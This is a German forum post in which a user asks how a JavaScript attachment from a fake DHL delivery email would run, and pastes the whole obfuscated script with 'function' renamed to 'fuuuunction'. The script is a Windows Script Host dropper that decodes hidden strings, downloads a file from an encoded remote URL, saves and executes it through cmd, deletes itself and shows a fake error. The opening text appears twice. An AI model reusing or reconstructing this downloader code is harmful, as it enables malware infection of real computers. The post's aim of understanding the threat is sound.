Hallo zusammen,
ich habe heute eine Mail von DHL über die angebliche Zustellungsbereitschaft bekommen. Im Anhang der Mail befindet sich eine ZIP-Datei, in der sich wiederum ein .js-Script befindet. Ich habe mal in das Script hinein geschaut und finde dort 29 Funktionen.
Muss man dazu zuerst eine HTML-Seite öffnen, in der die js-Datei verlinkt ist, und wo diese HTML-Datei dann die einzelnen Funktionen aufruft? Oder reicht es, wenn man versehentlich die js-Datei doppelklickt, um sie zu starten? Vemutlich ja, aber welche Funktion wird dann als erstes aufgerufen? Scheinen mir alles Phantasienamen zu sein.
Ich hänge den Code mal hier an. Damit kein Unsinn passiert, habe ich alle Zeichenketten 'function' zu 'fuuuunction' umbenannt, so dass der Schadcode so nicht ausführbar ist. Hoffe, das verstößt nicht gegen die Copyrights der Virus-Ersteller. ;-)
ich habe heute eine Mail von DHL über die angebliche Zustellungsbereitschaft bekommen. Im Anhang der Mail befindet sich eine ZIP-Datei, in der sich wiederum ein .js-Script befindet. Ich habe mal in das Script hinein geschaut und finde dort 29 Funktionen.
Muss man dazu zuerst eine HTML-Seite öffnen, in der die js-Datei verlinkt ist, und wo diese HTML-Datei dann die einzelnen Funktionen aufruft? Oder reicht es, wenn man versehentlich die js-Datei doppelklickt, um sie zu starten? Vemutlich ja, aber welche Funktion wird dann als erstes aufgerufen? Scheinen mir alles Phantasienamen zu sein.
Ich hänge den Code mal hier an. Damit kein Unsinn passiert, habe ich alle Zeichenketten 'function' zu 'fuuuunction' umbenannt, so dass der Schadcode so nicht ausführbar ist. Hoffe, das verstößt nicht gegen die Copyrights der Virus-Ersteller. ;-)
HTML:
fuuuunction uELEio(xfNt) {
var xewOV = [parseInt][(6584 + 1993 - 8577)](xfNt);
return xewOV;
}
fuuuunction xDUqQO() {
var vMFGBF = "f";
return vMFGBF;
}
fuuuunction PHhix() {
var gM = "r";
return gM;
}
fuuuunction IAL() {
var iMTuPa = "C";
return iMTuPa;
}
fuuuunction BFSK() {
var HoLy = "A";
return HoLy;
}
fuuuunction ewfJiK() {
var nmUK = "o";
return nmUK;
}
fuuuunction wwpaqFQ() {
var rzmZ = "c";
return rzmZ;
}
fuuuunction eGM() {
var YFBAlBHX = "a";
return YFBAlBHX;
}
fuuuunction Pjwx() {
var PKd = "e";
return PKd;
}
fuuuunction iQmNIW() {
var AeA = "h";
return AeA;
}
fuuuunction NtEwB(YPZjDT) {
var sl = uELEio(YPZjDT);
return sl;
}
fuuuunction oYLE() {
var OyRJji = [wwpaqFQ() + "h" + eGM() + PHhix() + IAL() + ewfJiK() + "d" + Pjwx() + "A" + "t"];
var Iu = OyRJji[(6584 + 1993 - 8577)];
return Iu;
}
fuuuunction cjPhowT() {
var Ds = [wwpaqFQ() + iQmNIW() + eGM() + PHhix() + BFSK() + "t"];
var fTRGAP = Ds[0];
return fTRGAP;
}
fuuuunction ldXIN(qgAgHRP, BJtAzsK) {
var pzVzZZZ = qgAgHRP;
var sk = BJtAzsK;
var gJEQSMQ = pzVzZZZ[cjPhowT()](sk);
return gJEQSMQ;
}
fuuuunction zaT(mnx, UBgE) {
var gRfzx = mnx[oYLE()](UBgE);
return gRfzx;
}
fuuuunction WsU(LAvFImWO) {
var spR = [xDUqQO(), PHhix(), ewfJiK(), "m", IAL(), "h", eGM(), PHhix(), IAL(), ewfJiK(), "d", Pjwx()];
return spR[LAvFImWO];
}
fuuuunction WrRl() {
var fJhEEHE = WsU((6584 + 1993 - 8577)) + WsU((7899 - 7898)) + WsU((1591 - 1589)) + WsU((8158 + 1047 - 9202)) + WsU((2263 + 1699 - 3958)) + WsU((2130 - 2125)) + WsU((1221 - 1215)) + WsU((4671 - 4664)) + WsU((645 + 1680 - 2317)) + WsU((1269 + 2155 - 3415)) + WsU((7653 + 1648 - 9291)) + WsU((9051 - 9040));
return fJhEEHE;
}
fuuuunction QXkPZu(GaWqdj, Arzcyd) {
var GLWRxd = GaWqdj % Arzcyd;
return GLWRxd;
}
fuuuunction gIbaj(kDuQlHMa, OwZGH) {
var bUtNK = kDuQlHMa ^ OwZGH;
return bUtNK;
}
fuuuunction dhVR(ikM) {
var TCbsamLp = ikM / (8158 + 1047 - 9202);
return TCbsamLp;
}
fuuuunction uRhC(hdmq) {
var Dv = '';
var LZrsEVZ = (6584 + 1993 - 8577);
var SQMW = 'sPczdBKaTzifm';
var NQKA = SQMW["length"];
var GudHN = (6584 + 1993 - 8577);
var Uy = "";
var YcOM = hdmq["length"];
while (GudHN < YcOM - (1591 - 1589)) {
var OdgsZfH = (6584 + 1993 - 8577);
var VuOmhFX = GudHN + (7899 - 7898);
var gDdklR = ldXIN(hdmq, VuOmhFX);
var gpI = ldXIN(hdmq, GudHN + (1591 - 1589));
var sx = ldXIN(hdmq, GudHN);
Uy = sx + gDdklR + gpI;
var glUnEUs = ldXIN(hdmq, GudHN);
var Kfqjehzk102 = (ldXIN(hdmq, GudHN + (7899 - 7898)) == (6584 + 1993 - 8577));
if (glUnEUs == OdgsZfH) {
var BNgyw = GudHN + (7899 - 7898);
var czx = GudHN + (2);
var qLu = ldXIN(hdmq, czx);
Uy = ldXIN(hdmq, BNgyw) + qLu;
}
var uzYRqf = ldXIN(hdmq, GudHN);
var Kfqjehzk101 = (uzYRqf == (6584 + 1993 - 8577));
if (Kfqjehzk101 && Kfqjehzk102) {
var fLTRZz = GudHN + (1591 - 1589);
Uy = ldXIN(hdmq, fLTRZz);
}
LZrsEVZ = NtEwB('' + Uy + '');
var AmzZ = dhVR(GudHN);
var Mbikpz = QXkPZu(AmzZ, NQKA);
var Kfqjehzk = zaT(SQMW, Mbikpz);
LZrsEVZ = gIbaj(LZrsEVZ, Kfqjehzk);
var KCR = WrRl();
var nKHnkaN = String;
Dv = Dv + nKHnkaN[KCR](LZrsEVZ);
var ANfnP = (8158 + 1047 - 9202);
GudHN = GudHN + ANfnP;
}
return Dv;
}
fuuuunction ReX() {
var af = [(2613 - 2612), [ActiveXObject][(0)], (2920 + 1003 - 3921)][1];
return af;
}
fuuuunction yZIIUF(dfegg) {
var bOWEs = ReX();
var YUnGzL = new bOWEs(dfegg);
return YUnGzL;
}
fuuuunction ybI() {
var VHCd = uRhC("027036023010094109100081097075089011012001059006014013044044079053009000007066017126006002001");
return VHCd;
}
fuuuunction CEJt() {
var PcsaP = [(2613 - 2612), [WScript][0], (2920 + 1003 - 3921)][1];
return PcsaP;
}
fuuuunction HIFyL() {
var kkNpkSS = uRhC("062003059055040112101057025054033050057035");
return kkNpkSS;
}
fuuuunction WkhPn(dldd, lfdff) {
dldd[uRhC("023053015031016039013008056031")](lfdff);
}
fuuuunction UkMtjub() {
var HOR = HIFyL();
var uPUHvttN = CEJt();
var bqsz = uPUHvttN[uRhC("032051017019020054013020056022039007000022")];
var vR = ybI();
var lD = yZIIUF(HOR);
var vqGF = uRhC("050020044062038108024021038031008011");
var zSQ = (7449, 5236, 7480, 6926, 3633, 4840, 9719, 6965, 4428, uRhC("052021055"));
lD[uRhC("028032006020")](zSQ, vR, 0);
var JQI = uRhC("000053013030");
lD[JQI]();
var KqUeK = uRhC("032051017019020054034015051084047015001022003026009016039038046054016012005025");
var tLYMle = yZIIUF(KqUeK);
if (lD[uRhC("032036002014017049")] == (2668 - 2468)) {
var dlt = yZIIUF(vqGF);
var DOXkuh = tLYMle[uRhC("052053023041020039040008053022047009001023053017")]((2920 + 1003 - 3921)) + '\\' + tLYMle[uRhC("052053023046001047059047053023012")]();
dlt[uRhC("060032006020")]();
var mXXWOG = uRhC("036003000008013050063079007018012010001");
dlt[uRhC("039041019031")] = (2613 - 2612);
var yWpD = yZIIUF(mXXWOG);
dlt[uRhC("036034010014001")](lD[uRhC("033053016010011044056004022021013031")]);
var XXtVJE = (1408 + 2189 - 3597);
dlt[uRhC("035063016019016043036015")] = XXtVJE;
dlt[uRhC("032049021031048045013008056031")](DOXkuh);
dlt[uRhC("048060012009001")]();
var SH = uRhC("016061007084001058046065123025073") + DOXkuh;
yWpD[uRhC("001037013")](SH, 0);
}
WkhPn(tLYMle, bqsz);
uPUHvttN[uRhC("022051011021")](uRhC("055049016090032045032020057031007018077026035023090010043040009032090031003031021172004024005048075"));
}
fuuuunction FwuR(RXk, qUT, BwLPu) {
var qTp = "OHbC";
if (qTp == true) {
}
var yQkaIQm = "xUcnIn";
if (yQkaIQm === true) {
var jITn = 75889;
}
switch (RXk) {
case false:
var mQrdcZ = "XcNGpr";
break;
case 1:
var Itp = 46023;
break;
case 0:
if (qUT == 0) {
var jqUmqvj = "iPIAY";
}
break;
};
var mbgPDw = "VumeK";
if (mbgPDw == true) {
}
return 0;
}
try {
if (FwuR(0, 1, 245) == false) {
var DMMf = true;
}
var WEQXLG = ([(3368 + 2053 - 5421), WScript])[(6350 + 2407 - 8756)];
var hbvBo = WEQXLG[uRhC("058062023031022035040021061012012")];
var mvQnY = hbvBo > (3368 + 2053 - 5421);
if (mvQnY) {
[(6350 + 2407 - 8756), UkMtjub][(6350 + 2407 - 8756)]();
}
} catch (icmUI) {}
Zuletzt bearbeitet von einem Moderator: